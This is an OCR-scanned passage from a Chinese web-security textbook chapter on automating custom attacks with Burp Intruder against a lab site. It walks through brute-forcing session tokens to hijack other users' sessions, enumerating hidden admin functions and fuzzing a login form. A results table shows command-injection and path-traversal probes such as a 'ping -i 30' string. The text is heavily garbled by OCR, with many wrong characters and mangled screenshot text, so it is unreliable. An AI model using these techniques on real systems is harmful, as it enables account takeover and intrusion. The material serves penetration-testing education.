时 ， 它 在 几 秒 钟 内 就 能 发 现 至 少 两 个 严重 的 安全 汤 洞 。 

尽管 它 的 功能 强大 , 但 是 ， 只 要 开始 使 用 JAttack 这 样 的 工具 实施 日 动 化 定制 攻击 , 渗透 测试 
员 就 立即 可 以 发 现 其 他 更 有 用 的 功能 。 按 现在 的 情况 , 需要 在 工具 的 源 代码 中 配置 每 一 个 目标 请 
求 ， 然 后 重新 编译 它 。 但 最 好 是 从 一 个 配置 文件 中 读 取 这 些 信息 ， 然 后 在 运行 时 动态 构建 攻击 。 
实际 上 ， 最 好 的 办 法 是 建立 一 个 友好 的 用 户 界 面 ， 可 通过 它 在 几 秒 钟 内 配置 上 述 攻击 。 

许多 时 候 , 渗透 测试 员 还 需要 以 更 加 灵活 的 方式 生成 有 效 载 傈 ,并 使 用 比 我 们 创建 的 有 效 载 
何 源 更 高 级 的 源 。 而 且 ， 通 常 还 需要 文 持 SSL、HTTP 验 证 、 多 线程 请 求 、 目 动 跟随 重 定 向 ， 并 
对 有 效 载 傈 内 的 不 稼 见 字 符 进 行 目 动 编 铝 。 有 时 ， 一 次 只 修改 一 个 参数 可 能 党 得 限制 过 大 ; 攻击 
者 可 能 希望 同时 在 两 个 参数 中 注入 不 同 的 有 效 载 和 来 源 。 为 便于 参考 , 最 好 是 保存 应 用 程序 的 全 
部 啊 应 ， 这 样 就 可 以 立即 检查 一 个 有 用 的 啊 应 ， 了 人 解 发 生 了 什么 状况 ， 甚 至 手动 调整 对 应 的 请 求 
并 重新 提出 这 个 请 求 。 除 了 不 断 修改 和 提出 同一 个 请 求 , 有 时 需要 处 理 多 阶段 进程 、 应 用 程序 会 话 
和 预 请 求 令 牌 。 同 样 ， 最 好 是 将 这 个 工具 与 其 他 有 用 的 工具 (如 代理 服务 硕 与 朴 虫 ) 整合 起 来 ， 避 
够 来 回 剪 切 和 粘贴 信息 。 

Burp Intruder 是 唯一 能 够 执行 所 有 这 些 功 能 的 工具 。 它 专门 为 通过 最 少 的 配置 实施 各 种 自动 
化 定制 攻击 而 设计 ， 并 且 在 输出 结果 中 提供 大 量 细 市 ， 帮 助 迅 速 确 定 “ 触 点 ”和 其 他 反常 现象 。 
它 还 可 与 其 他 Burp Suite 工 具 完 全 整合 。 例 如 ， 可 以 在 代理 服务 器 中 拦截 一 个 请 求 ， 将 它 提 交 给 
Intruder 进行 模糊 测试 ， 并 在 几 秘 钟 内 确定 前 面 示例 中 摘 述 的 各 种 漏洞 。 

下 面 描述 Burp Intruder 的 基本 功能 与 配置 , 然后 分 析 使 用 它 执 行 日 动 化 定制 攻击 的 一 些 示例 。 

1. 安置 有 效 载 从 

Burp Intruder 使 用 一 个 类 似 于 JAttack 的 概念 型 模型 ， 在 请 求 的 特定 位 置 安 置 有 效 载 何 ， 并 使 用 
一 个 或 几 个 有 效 载 傈 来 源 。 然 而 , 它 的 功能 并 不 仅 限 于 将 有 效 载 仙 字符 串 插 入 到 请 求 参 数值 中 ; 有 
效 载 何 可 安置 在 参数 值 的 某 个 局 部 位 置 或 参数 名 中 ， 也 可 以 安 逆 在 请 求 消息 头 或 主体 的 任何 位 置 。 

确定 以 革 个 特殊 请 求 作为 攻击 对 象 后 ，Burp Intruder 使 用 一 组 标记 定义 每 个 有 效 载 荷 位 置 ， 
指明 插入 有 效 载 傈 的 起 始点 与 结束 点 ， 如 图 14-1 所 示 。 
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burp intruder repeater window about 








target | proxy | spider | scanner | intruder | repeater 
和 


target | pos 市 OnS | payloads | options | 


s ] 
sequencer decoder | comparer | options | alerts | 

















attack type |sniper 四 
length: 638 
[POST /auth/ 459/NewUserStep? .ashx ?mode=BD Eo ds FT a | addS 
|Accept: text,/html, application/xhtml+xml, */* WE ENET 
Referer: https://mdsec.net/auth/459/NewUser .ashx 
Accept—-Landuadge: en-GB 





8 payload positions 





clear § 
User-AMdgent: Hozilla/5.0 lcompatible; MSIE 9.0; Windows NT 6.1; WOWE4; 
Trident/5.0) auto § 
Content-Type': application/x-www-form-urlencoded ee 
IAccept—-Encoding: gzip, deflate 
IHost: mdsec.net 
IContent-Length: 142 
Connection: Keep-Alive 
ICache-Control: no-cache 
Cookie: SessionId=§303ES4ESDAlISEESPIIA2 JSSDACEY SES 








refresh 





FEalnamc=SBESTIIIETIOOSLEEScuscrnamc=SaacceScuscrrolc=SuUSEEScbassword=Sc 


UssswUrnessxccontirmpassword=ScrOssswOrdsscnoncc=S303F3dak5DRL3SEESRIIL ROLLS3DR 
CB7735CS 














加 区 四 | es 


| 0 matches 

















图 14-1 安置 有 效 载 位 


在 菏 个 位 置 插 入 有 效 载 傈 时 , 标记 之 间 的 任何 文本 将 被 有 效 载 何 重 写 。 如 来 没有 插入 有 效 载 
何 ， 就 提交 标记 间 的 文本 。 为 便于 一 次 测试 一 个 参数 ,同时 将 其 他 参数 保持 原样 ,这样 做 是 必要 
的 。 这 一 做 法 与 对 应 用 程序 进行 模糊 测试 时 完全 相同 。 单 击 auto 按 钮 将 指示 Intruder 在 所 有 URL、 
cookie 和 主体 参数 值 中 设 定 有 效 载 信 位置， 从 而 将 在 JAttack 中 需要 手动 操作 的 任务 自动 化 。 

sniper 攻 击 类 型 是 最 常见 的 一 种 攻击 类 型 ， 它 的 作用 与 JAttack 的 请 求 引 擎 相同 : 一 次 针对 一 
个 有 效 载 丛 位 置 ， 在 那个 位 置 提交 所 有 有 效 载 信 ,然后 转向 下 一 个 位 置 。 其 他 攻击 类 型 允许 使 用 
几 个 有 效 载 傈 ， 以 不 同 的 方式 一 次 针对 几 个 位 置 进行 攻击 。 

2. 选择 有 效 载 从 

准备 攻击 的 下 一 个 步 又 是 选择 将 要 在 指定 位 置 插 入 的 有 效 载 傈 。Intruder 包含 大 量 用 于 生成 
攻击 有 效 载 何 的 内 置 功能 。 

口 预 完 设置 与 可 配置 的 数据 列表 。 

口 根据 任何 语法 模式 对 有 效 载 傈 进行 定制 迭代 。 例如 ,如 末 应 用 程序 使 用 ABC45D 形 式 的 用 

户 名 ， 那 么 可 以 使 用 定制 迭代 硕 遍 历 所 有 可 能 的 用 户 名 。 
D 字符 与 大 小 写 殖 换 。 根 据 最 初 的 有 效 载 傈 列表 ，Intruder 可 修改 单个 的 字符 及 其 大 小 写 ， 
以 生成 它们 的 变化 形式 。 这 项 功能 在 对 密码 实施 蛮 力 攻击 时 非常 有 有 用， 例如， 字符 串 
password 可 修改 为 p4 ssword、 passw0rd、Password、PAS SWORD 等 。 

口 数字 可 用 于 遍历 文档 ID 、 会 话 令 牌 等 。 数 字 可 为 十 进 制 或 十 六 进 制 、 整 数 或 分 数 、 按 顺 

序 排列 、 逐 步 递 增 或 完全 随机 。 当 知道 一 些 有 效 值 的 大 小 ， 但 无 法 确定 推断 这 些 值 的 任 

何 可 秆 模式 时 ， 在 一 个 指定 的 范围 内 生成 随机 数字 可 用 于 搜索 “和 触 点 ”。 
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口 某 些 情况 下 ， 日 期 和 数字 有 看 相同 的 用 途 。 例 如 ， 如 采 登 录 表 单 要求 输 入 出 生日 期 ， 那 
么 就 可 以 使 用 这 项 功能 对 指定 范围 内 的 所 有 有 效 值 实施 塞 力 攻击 。 
口 可 使 用 非法 Unicode 编 码 ， 通 过 提交 恶意 字符 的 编码 形式 避 开 一 些 输入 过 滤 。 
口 字符 块 可 用 于 探查 绥 冲 区 溢出 漏洞 〈 请 参阅 第 16 章 了 解 相关 内 容 )。 
口 臂力 功能 可 用 于 生成 一 个 特殊 字符 集 在 指定 长 度 范 围 内 的 所 有 排列 组 合 。 许 多 时 候 ， 由 
于 它 能 生成 大 量 的 请 求 ， 使 用 这 种 功能 是 我 们 能 够 依赖 的 最 后 一 个 办 法 。 例 如 ， 对 仪 包 
含 小 写字 母 字 符 的 6 位 数 密码 进行 人 下 力 攻击 ， 将 生成 300 多 万 个 排列 组 合 ; 仪 通过 远程 访 
问 应 用 程序 几乎 不 可 能 提交 如 此 数目 庞大 的 请 求 。 
口 “学 符 打 乱 ” 和 “位 翻转 ”功能 ， 可 用 于 系统 化 地 操纵 参数 的 现 有 值 的 各 个 部 分 ， 以 探 
查 应 用 程序 如 何人 处 理 各 种 难以 察觉 的 修改 ( 请 参阅 第 7 草 )。 
除 有 效 载 何 生 成 功能 外 , 还 可 以 配置 一 些 规则 , 在 使 用 有 效 载 集 值 之 前 对 每 个 值 进行 任意 处 
理 。 这 包括 字符 串 和 大 小 写 修 改 、 各 种 编 解码 方案 以 及 散 列 操作 。 这 样 做 有 助 于 在 各 种 非 浓 规 情 
况 下 构建 有 用 的 有 效 载 位 。 
默认 情况 下 ， 在 请 求 中 插入 字面 量 字 符 会 使 请 求 失效 ，Burp Intruder 会 对 这 些 字 符 进 行 URL 
编码 。 
3. 配置 啊 应 分 析 
在 实施 攻击 前 ， 渗 透 测试 员 应 当 确 定 想 要 分 析 的 服务 怖 啊 应 属性 。 例 如 ， 当 枚 举 标识 符 时 ， 
可 能 需要 在 每 个 啊 应 中 搜索 一 个 特殊 的 字符 串 ; 在 模糊 测试 时 , 攻击 者 也 许 希 望 扫描 大 量 和 常见 的 
错误 消息 等 。 
默认 情 部 下，Intruder 会 在 它 的 结果 表 中 记录 HTTP 状 态 码 、 啊 应 长 度 、 服 务 需 设 定 的 任何 
cookie 以 及 收 到 啊 应 的 时 间 。 和 JAttack 一 样 ， 还 可 以 配置 Burp Intruder 对 应 用 程序 的 啊 应 进行 其 
他 一 些 目 定 义 分 析 , 以 帮助 确定 表明 存在 漏洞 或 值得 座 入 调查 的 数据 。 可 以 指定 在 啊 应 中 搜索 的 
字符 串 或 正则 表达 式 ; 可 以 设 定 目 定义 字符 串 ， 控 制 从 服务 各 的 啊 应 中 提取 数据 ; 还 可 以 指示 
Intruder 检 查 每 个 啊 应 是 否 包 信 攻击 字符 串 本 身 ， 以 帮助 确定 器 站 点 脚本 和 其 他 啊 应 注入 漏洞 。 
确定 有 效 载 人 苘 位 置 、 有 将 载 傈 来源 以 及 需要 对 服务 融 啊 应 进行 哪些 分 析 后 , 渗透 测试 员 就 可 
以 实施 攻击 。 下 面 简要 说 明 如 何 使 用 Intruder 实 施 一 些 常 见 的 自动 化 定制 攻击 。 
4. 攻击 1: 枚 举 标识 符 
假设 正 以 一 个 支持 匿名 用 户 自 我 注册 的 应 用 程序 为 攻击 日 标 ,创建 一 个 账户 ,登录 应 用 程序 ， 
访问 最 少量 的 功能 。 在 这 个 阶段 ， 应 用 程序 的 会 话 令 牌 是 一 个 明显 的 攻击 对 象 。 连 续 进 行 几 次 登 
录 ， 会 得 到 以 下 令 牌 : 
000000-fb2200-16cb12-172ba72551 
000000-bc7192-16cb12-172ba7279e 
000000-73091f-16cb12-172ba729e8 
000000-918cb1-16cb12-172ba72a2a 


O00000-aa820f-16cb1l2-172ba72b58 
O00000-bc8710-16cb1l2-172ba72e2b 


按照 第 7 章 描 述 的 步骤 分 析 这 些 令 牌 后 会 发 现 : 很 明显 ， 令 牌 中 几乎 有 一 半 的 内 容 没 有 发 生 
变化 ; 但 是 , 令 牌 的 第 二 部 分 实际 上 并 未 被 应 用 程序 处 理 。 完 全 修改 这 个 部 分 并 不 会 使 令 牌 失效 。 
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而 且 , 虽然 这 些 令 牌 并 不 严格 按 顺序 排列 , 但 最 后 一 部 分 明显 以 某 种 方式 向 上 递增 。 根据 这 些 信 
息 ， 渗 透 测 试 员 也 许 能 够 对 应 用 程序 实施 会 话 支持 攻击 。 

要 利用 自动 技巧 实施 这 个 攻击 ,需要 找到 一 个 可 用 于 探查 有 效 令 有 牌 的 请 求 / 啊 应 对 。 通 常 ， 
任何 访问 应 用 程序 通过 验证 的 页 面 的 请 求 都 可 用 于 这 种 目的 。 假设 以 每 名 用 户 登录 后 显示 的 主页 
为 攻击 对 象 


GET /auth/502/Home.ashx HTTP/1.1 
Host: mdsec.net 


Cookie: SessionID=000000-fb2200-16cb1l2-172ba72551 


由 于 已 经 知道 会 话 令 脾 的 结构 及 应 用 程序 如 何 处 理 令 牌 , 因此 ,只 需 令 牌 的 最 后 一 个 部 分 就 
可 实施 攻击 。 实 际 上 ， 根 据 前 面 确定 的 令 牌 序列 ， 最 有 效 的 初步 攻击 只 需 修 改 令 牌 最 后 的 几 位 数 


字 。 因 此 ， 用 Intruder 配 置 唯一 一 个 有 效 载 和 何 位 置 ， 如 图 14-2 所 示 。 



































burp intruder repeater window about 


target | proxy | spider | scanner | intruder | repeater | sequencer | decoder | comparer 
t | 











options | alerts | 








target positions | payloads | options | 











attack type |sniper ww 
1 payload position length: 380 
[GET /auth/502/Home.ashx HTTP/1.1 





Accept: text/html, application/xhtml+xml, */* 
Referer: https://mdsec.net/auth/ 502/ 
Accept—-Landguadge: en-GB 


User-Agent: Hozilla/5.0 (compatible; MSIE 9.0; Windows NT €.1; WOWE4; 


Trident/5.0) 

Cookie: Sess:i:onId=000000-F94B4E-1Ecbhl2-3B67ABCSSBOS 
AcCcept-Encod:ng: gzips deflate 

Host: mdsec.net 

Connection: Feep-Alive 

Cache-Contro-:: no-cache 

















可 





| 0matches 




















图 14-2” 设 定 一 个 定制 的 有 效 载 千 位 置 


有 效 载 位 需要 授 历 最 后 三 位 的 所 有 可 能 值 。 令 牌 使 用 的 可 能 是 十 六 进 制 字 符 集 : 0~9 与 a~f。 
此 ， 配 置 一 个 有 效 载 荷 来 源 生成 0x000~0xfff 之 间 的 所 有 十 六 进 制 数字 ， 如 图 14-3 所 示 。 

在 枚 举 有 效 会 话 令 牌 的 攻击 中 ， 通 常 可 以 直接 确定 “ 触 点 ”。 在 当前 的 示例 中 已 经 确定 : 如 
果 提 交 一 个 有 效 的 令 牌 ， 应 用 程序 会 返回 一 个 HTTP 200 响 应 ; 否则 就 返回 一 个 退回 登录 页 面 的 
HTTP 302 重 定 回 。 因 此 ， 测 试 员 不 必 为 攻击 配置 任何 定制 的 啊 应 分 析 。 

实施 攻击 后 ，Intruder 将 迅速 循环 提出 所 有 请 求 。 攻 击 结果 在 一 个 表格 中 显示 ， 可 以 单 击 表 


的 列 标题 , 根据 该 列 的 内 容 对 结果 进行 分 类 。 按 状态 码 分 类 可 帮助 轻松 确定 已 经 发 现 的 有 效 令 牌 ， 
如 图 14-4 所 示 。 
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burp intruder repeater window about 


FL ropeater | seavencer | decoder | comparer | opions | aers | 


number of payloads: 4.096 
number ofrequests: 4096 


payloadset [1 [>] [mmbs lz| 
format 


o | minintegerdigits 

mm | max integer digits 

[1 | minfraction digits 
how many /maxfradtion digits 
® sequential Odecimal examples: 001 


O random (®@) hex cafebabe 


payload processing rules 








attack save columns 





全 
i engih | comment 
面 | 国 Tes? loaseine reaues 


ee ne 


[type="text/css">H3 { font-family: Verdana, Arial, Helvetica, sans-—-serif; 
font—-size: 1.0em: line-height: 1.0em: }bhody { font-family: Verdana, Arial, 
Helvetica, sans-serif; font-size: 0.8em; }¢/,style></head><body><table 
bgcolor="#COEDOSO" width="100$"><tr><td><font face="Arial" size="5">Enbhbsp;Home 
page</font></td><td><imdg border="D" src="/vahh.png" width="128" height="74" 
align="right"></td></tr></table><table border="1l" bgcolor="#000000" 
bordercolor="#000000" cellspacing="0" cellpadding="D"width="100%$" 
style="border-collapse: collapse"><tr><td></td></tr></table><br/> 


<imd align="absmiddle" src="home.png">Enbhbsp;Logged in as: 
Administrator.<br><br><a 5 ee el NS 


23 minn3Sm 





图 14-4 “分 类 攻击 结果 以 迅速 确定 “ 触 点 ” 
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攻击 取得 成 功 。 现 在 渗透 测试 员 可 以 选择 任何 返回 HITP 200 啊 应 的 有 效 载 和合， 用 这 个 有 效 
载 千代 符 会 话 令 牌 最 后 的 三 个 数字 ， 从 而 声 持 其 他 应 用 程序 用 户 的 会 话 。 然 而 ， 对 绪 末 表 进 行 仔 
细 分 析 后 会 发 现 : 由 于 应 用 程序 向 不 同 用 户 显 示 的 主页 几乎 完全 相同 ， 因 而 大 多 数 HTTP 200 啊 
应 的 长 度 也 大 致 相同 。 然 而， 其 中 有 两 个 啊 应 要 更 长 一 些 ， 表 示 应 用 程序 网 它们 返回 了 一 个 不 同 
的 页 面 。 

















可 以 在 Intruder 中 双击 其 中 一 个 结果 ， 以 HTTP 源 代码 或 HTML 格式 完整 显示 服务 器 的 响应 。 
之 后 会 发 现 ， 与 主页 相 比 , 较 长 的 主页 中 包含 大 量 菜单 选项 。 据 此 推测 ， 这 两 个 支持 的 会 话 似乎 
属于 更 高 权限 的 用 户 。 





尝试 访问 


http://mdsec.net/auth/502/ 


提示 事实 证 明 ， 响 应 长 度 往往 是 一 个 明显 的 指标 ， 指 出 值得 进一步 调查 的 反常 响应 。 
Y | 在 上 面 的 示例 中 ， 一 个 长 度 不 同 的 响应 会 让 测试 员 发 现在 设计 攻击 时 未 曾 预 料 到 的 管 


理 员 会 话 令 牌 。 因 此 , 即使 其 他 属性 提供 了 一 个 可 靠 的 “和 触 点 ”指标 ( 如 HTTP 状 态 码 )， 
还 是 应 始终 检查 响应 长 度 列 ， 以 确定 其 他 有 用 的 响应 。 





5. 攻击 2: 获取 信息 

进一步 浏览 到 应 用 程序 的 已 通过 验证 的 区 域 , 我 们 注意 到 应 用 程序 在 URL 参 数 中 使 用 索引 号 
来 标识 用 户 请 求 的 功能 。 例 如 ， 以 下 URL 用 于 显示 当前 用 户 的 “用 户 资 料 ” 页 面 : 

https://mdsec.net/auth/502/ShowPage.ashx?pageid=320100339 

这 种 行为 提供 了 一 个 极 好 的 机 会 , 可 用 于 搜集 之 前 尚未 发 现 及 未 获得 正确 授权 的 功能 ,为 此 ， 
可 以 使 用 Burp Intruder 遍 历 一 系列 可 能 的 pageid 值 ， 并 提取 出 所 发 现 的 每 个 页 面 的 标题 。 

在 这 种 情况 下 , 通 稼 较为 明 千 的 做 法 ,是 在 某 个 已 知 包含 有 效 什 的 数值 范围 内 开始 内 容 搜集 。 
为 此 ， 可 以 将 有 效 载 傈 位 置 标 记 设 置 为 针对 pageid 的 最 后 两 位 数 ， 如 图 14-5 所 示 ， 并 生成 00 到 
99 范 围 内 的 有 歼 载 谷 。 

攻击 者 可 以 配置 Intruder 使 用 “提取 Grep” 功 能 以 可 用 的 方式 截取 所 有 这 些 信 息 。 其 运作 方 
式 与 JAttack 的 提取 功能 类 似 只 需 指定 想 要 提取 的 数据 之 前 的 表达 式 ， 如 图 14-6 所 示 。 

实施 此 攻击 将 迅速 遍历 pageid 参 数 最 后 两 位 的 所 有 可 能 值 , 并 显示 每 个 啊 应 中 的 页 面 标题 ， 
如 图 14-7 所 示 。 从 图 中 可 以 看 出 ， 一些 啊 应 似乎 包含 有 用 的 管理 功能 。 此 外 ， 一 些 啊 应 为 指 问 其 
他 URL 的 重 定 癌 ， 这 需要 进一步 调查 。 为 此 ， 可 以 配置 Intruder 实 施 攻击 ， 以 提取 这 些 重 定 问 的 
目标 ,或 者 目 动 访问 这 些 重 定 同 ， 并 显示 最 终 的 啊 应 中 的 页 面 标题 。 


党 试 访 问 


http:/mdsec.netauth/302/ 















































‘intruder | repeater | sequencer comparer i 
vy rr 人 re eR 


1 payload positiion 

GET /auth/502/ShowPage.ashx?pageid=320100 HTTP/1.1 
Accept: text/html, application/xhtml+xml, */* 

Referer: https://mdsec.net/auth/502/,Home.ashx 
Accept—-Landguadge: en-GB 

User-Agent: Hozilla/5.0 (compatible; MSIE 9.0; Windows NT 6€.1; WOWE4; 
Trident/5.0) 

Accept—-Encod:ng: gzip, deflate 

Host: mdsec.net 

Connection: Feep-Alive 

Cookie: Sess-onId=D00000-89857A-16chbl1l2-3B67ABC3D1 


[Lz][<j[=| | 0 matches 





图 14-5 ”安置 有 效 载 位 


intruder | repeater | sequencer comparer | options | 
| 天 Te 一 sm ls pg pm rv NY ert E 


办 capture text following these expressions: 
<title> @®) simple patterm match 


DO regex 


a 
器 case sensitive stop capturing at E | 


四 exclude HTTP headers max capture lencth |100 








图 14-6 ”配置 “提取 Grep” 功 能 


6. 攻击 3: 应 用 程序 模糊 测试 

除 利用 日 志 功 能 提取 有 用 的 信息 外 ， 当然 还 可 以 探查 应 用 程序 中 是 否 存 在 常见 的 漏洞 。 为 确 
保 测 试 合理 ， 攻击 者 应 该 测试 所 有 的 参数 和 请 求 ， 从 登录 请 求 开 始 。 

为 迅速 对 前 面 的 请 求 进行 模糊 测试 ， 必 须 在 所 有 请 求 参 数 中 设 定 有 效 载 集 位 置 。 只 需 单 击 
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position 选 项 卡 上 的 auto 按 钮 即 可 完成 这 项 操作 ， 如 图 14-8 所 示 。 


attack save columns 


Filter: showing all items 
i Sn 时 
器 一 是 1314 Admin 


国 ~ 轩 1 Changepassword | 





baseline recuest 





1375 


Show Users 


<form method="post" action="ShowpaceE .ashx2paceiad=32010056587" 
autocomplete="off"><table cellspacing="l0"><tr><td>Real name:</td><td><input 
name="realname" 
type="text"/></td><td>Enhsp;</td></tr><tr><td>Username:</td><td><input 
name="username" 
type="text"/></td><td>Enhsp;</td></tr><tr><td>Role:</td><td><select 
name='"userrole" style="width: 5SS5px; "><option selected="selected" 
value="user">User</option><option 
value="admin">Administrator</option></select></td></tr><tr><td>Password:</td><td> 
<input name="password" type="password"/></td><td>Must contain at least 8 
characters, including letters and numhers.</td></,tr><tr><td>Confirm 
password:</td><td><input name="confirmpassvord" 
type="password"/></td><td><input type="submit" value="Create" 


0 matches| 








图 14-7 遍历 功能 寺 引 值 并 提取 每 个 生成 的 页 面 的 标题 


burp intruder repeater window about 








EDST /auth/502/Default.ashx HTTP/1.1 
: text/html, application/xhtml+xml, */* 
: https://mdsec.net/auth/ S502/Default .ashx? tusername=ygeronimo 
Accept—-Language: en-GB 
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; 
Trident/5.0) 
Content-Type'; application/x-wwyw-form-urlencoded 
Accept—-Encoding: gzip, deflate 
Host: mdsec.net 
Content-Length: 27 
Connection: Keep-Alive 
Cache-Control: no-cache 


user name -BUEN passvor d- SLES 


Eisliadl | omatches 





图 14-8 ”配置 Burp Intruder 对 登录 请 求 进 行 模糊 测试 
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和 使 用 JAttack 实 施 模糊 测试 攻击 一 样 , 接 下 来 需要 手动 检查 结果 表 , 确定 任何 值得 深入 调查 
的 有 反 第 现象 ， 如 图 14-9 所 示 。 与 前 面 的 攻击 中 一 样 ， 可 以 单 击 列 标题 ， 以 各 种 方式 对 啊 应 进行 分 
类 ， 从 而 迅速 确定 有 用 的 数据 。 


可 er attack 6 一 二 | 


attack save columns 





Filter: showing all items 


| results | target | positions | payloads | options 

















































































































request | position | payload | length | error |exce...! fail lvarchal ODBC| SQL lguota..! Syntax| comment | 

0 | |200 国 | 国 |1609 [ed 让 | 辐 | 国 | 国 | 国 | 国 | 国 lbaselinerequest a 

:| i BoE 

2 上 xsstest 4200 | 国 | 国 /1611 图 | 国 | 姑 | 图 | 图 | 图 | 国 | 国 | 

3 1 |siioo> |200 国 | 国 |1616 [3 bd 

4 国 LIetc .200 国 | 国 |1644 "| | | | ml | ee 雪 

5 1 LEADbo |200 加 | sl |1642 ] a a m 

6 1 DI) |200 | 国 | 国 /1614 加 图 | | 天 

区 1 lping -i 30 127.0.0..../200 | il | 加 |1664 | | ] ] 

8 1 四 j200 加 | 国 |1607 图 | 国 | 因 | 国 | 国 | 国 | 国 | 外 站 

9 _ 1 ;echo 111111 |200 | | 加 |1616 以 加 | el 

10 上 1200 图 | 国 |1584 国 | 国 | 加 | 此 | 网 

11 |2 |xsstest 1200 ul | 加 |1609 L | | 大 | 晤 | 

12 |2 | > |20 | | ul |1609 | | | | 国 | |] | 了 | 

request | response | A 

[ raw | headers | hex | html | render | | 

[cellpadding="O"width="100$" style="horder-collapse: collapse"><tr><td></td></tr></table><br/> [=| 
p—| 


<form method="post" id="forml" name="forml" action="Default.ashx'" autocomplete="off"><table 
cellspacing="10"><tr><td>Username:</td><td><input name="username" type="text" 
value="i"/></td><td>Enbsp;</td></tr><tr><td>Password:</td><td><input name="password" type="password" | 
value=""/></td><td><input type="submit" value="Login" /></td></tr></table></form><br/><a 
href="Redgister.ashx">Register</a><br><br><hr>Unclosed quotation mark after the character string '''! = 
Incorrect syntax near '''.</body></html> 





























图 14-9 ”对 一 个 请 求 进行 模糊 测试 得 到 的 结 


对 测试 结 采 进行 初步 分 析 可 以 得 出 结论 ， 应 用 程序 似乎 易于 受到 SQL 注 入 。 在 有 效 载 傈 位 置 
1 和 2 提交 一 个 单 引 写 后 ， 应 用 程序 会 运 回 为 一 个 啊 应 ， 其 消 肯 中 包含 子 伯 串 quotation 和 syntax。 

















这 种 行为 明确 表示 ， 需 要 进行 手动 调查 才能 确定 和 利用 其 中 的 源 洞 。 


党 试 访问 





http:/mdsec.netauth/302/ 


提示 “可 以 右键 单 击 任何 看 似 有 用 的 结果 ， 将 响应 发 送 至 Burp Repeater 工具 。 这 个 
中 | 工具 允许 手动 修改 请 求 ， 然 后 多 次 重新 发 布 这 个 请 求 ， 以 测试 应 用 程序 如 何 处 理 不 同 


的 有 效 载荷 、 探 查 避 开 过 滤 的 方法 或 者 实施 具体 的 攻击。 





14.6 ”实施 目 动 化 的 限制 


本 章 目 前 介绍 的 各 种 技巧 在 许多 应 用 程序 中 都 可 以 使 用 ， 而 不 会 出 现任 何 问题 。 但 是 , 在 其 
他 情况 下 ， 可 能 存在 各 种 导致 无 法 实施 定制 日 动 化 攻击 的 障碍 。 
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通 第 ， 实 施 目 动 化 的 限制 主要 分 为 以 下 两 类 。 
会 话 处 理 机 制 ， 这 类 机 制 会 防御 性 地 终止 啊 应 意外 请 求 的 会 话 ,， 采用 因 请 求 而 寞 的 反 
OR 的 临时 参数 值 ( 请 参阅 第 13 革 了 解 相 关内 容 )， 或 涉及 多 阶段 过 程 。 
口 CAPTCHA 控 件 , 这 类 控件 则 在 阻止 目 动 工具 访问 特定 应 用 程序 功能 ,如 注册 新 用 户 账 刻 
的 功能 
我 们 将 讨论 以 上 每 一 种 情形 , 并 介绍 通过 优化 目 动 工具 或 查找 应 用 程序 的 防御 缺陷, 从 而 突 
破 实 施 目 动 化 的 限制 的 方法 。 


14.6.1 会 话 处 理 机 制 


许多 应 用 程序 采用 会 话 处理 机 制 和 其 他 有 状态 功能 来 防止 目 动 测试 。 以 下 是 一 些 可 能 会 形成 
限制 的 情形 。 
口 测试 请 求 时 ， 应 用 程序 会 出 于 防御 或 其 他 目的 ， 终 止 用 于 测试 的 会 话 ， 剩 下 的 测试 也 随 
2 
口 某 个 应 用 程序 功能 使 用 必须 随 每 个 请 求 提供 的 不 断 变化 的 令 牌 ( 例如， 为 防止 请 求 伪 造 
Mi) 
口 所 测试 的 请 求 在 多 阶段 过 程 中 显示 。 只 有 在 首先 提出 一 系列 其 他 请 求 ， 应 用 程序 进入 适 
当 的 状态 时 ， 该 请 求 才 会 得 到 正确 处 理 。 
基本 上 , 通过 针对 应 用 程序 使 用 的 各 种 机 制 来 优化 目 动 化 技巧 , 通常 可 以 突破 这 类 妨碍 。 如 
有 果 在 JAttack 代 人 码 中 写 入 目 己 的 测试 代码 ， 就 可 以 直接 突破 特定 的 会 话 处 理 或 多 阶段 机 制 。 但 是 ， 
这 种 方法 可 能 较为 复杂 ,并且 不 能 有 效 地 移植 到 大 型 应 用 程序 中 。 实 际 上 ， 如 果 在 处 理 每 一 个 新 
问题 时 都 需要 编写 新 的 定制 代码 , 这 本 续 就 是 实施 目 动 化 的 一 大 限制 , 这 种 方法 甚至 不 如 较 慢 的 
手动 技巧 。 
Burp Suite 的 会 话 处 理 支持 
对 好 ，Burp Suite 提 供 了 一 系列 功能 ， 可 用 于 尽 可 能 轻松 地 处 理 所 有 这 些 情形 ， 以 便于 渗透 
测试 员 继续 进行 测试 ， 而 由 Burp 在 后 台 无 颖 处 理 各 种 限制 。 这 些 功 能 基于 以 下 组 件 : 
口 cookie 库 ; 
口 请 求 宏 ; 
口 会 话 处 理 规则 。 
我 们 将 简要 介绍 如 何 组 合 使 用 这 些 功 能 来 克服 实施 自动 化 的 限制 , 从 而 在 上 述 各 种 情形 下 继 
续 进行 测试 。 有 关 详 细 的 帮助 信息 ， 请 参阅 Burp Suite 的 在 线 文档 。 
@ cookiel| 
Burp Suite 维 护 上 自己 的 cookie 库 ， 用 于 追踪 浏览 锅 和 Burp 上 自己 的 工具 使 用 的 应 用 程序 cookie。 
渗透 测试 员 可 以 配置 Burp 目 动 更 新 cookie 库 的 方式 ， 还 可 以 直接 查看 和 编辑 其 内 容 ， 如 图 14-10 
所 示 。 
就 其 本 刁 而 言 ， 该 cookie 库 并 不 执行 任何 操作 ， 但 Burp 的 其 他 会 话 处 理 文 持 组 件 需 要 用 到 它 
追踪 的 关键 值 。 
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® [| [00 

宏 是 预先 定义 的 一 个 或 多 个 请 求 。 宏 可 用 于 执行 各 种 会 话 相 关 的 任务 ， 包 括 : 

口 提取 应 用 程序 页 面 ( 如 用 户 的 主页 )， 以 检查 当前 会 话 是 否 仍然 有 歼 ; 

口 执行 登录 ， 以 获取 新 的 有 效 会 话 ; 

口 获取 令 牌 或 nonce， 以 在 其 他 请 求 中 用 作 参 数 ; 

口 在 多 阶段 过 程 中 扫描 请 求 或 对 其 进行 模糊 测试 时 ， 需 要 提前 执行 一 些 请 求 ， 以 便于 应 用 
程序 进入 将 接受 目标 请 求 的 状态 。 


edit cookie 


0 | renoecooue | 
208A | removecooke ， 





图 14-10 Burp Suite cookie 库 


使 用 浏览 融 可 以 录制 安 。 在 定义 宏 时 ，Burp 会 显示 Burp Proxy 的 历史 记录 视图 ， 从 中 可 以 选 
择 定 义 宏 所 需 的 请 求 。 这 时 可 以 选择 以 前 提出 的 请 求 , 或 重新 录制 宏 并 从 该 历史 记录 中 选择 新 项 
日 ， 如 图 14-11 所 示 。 














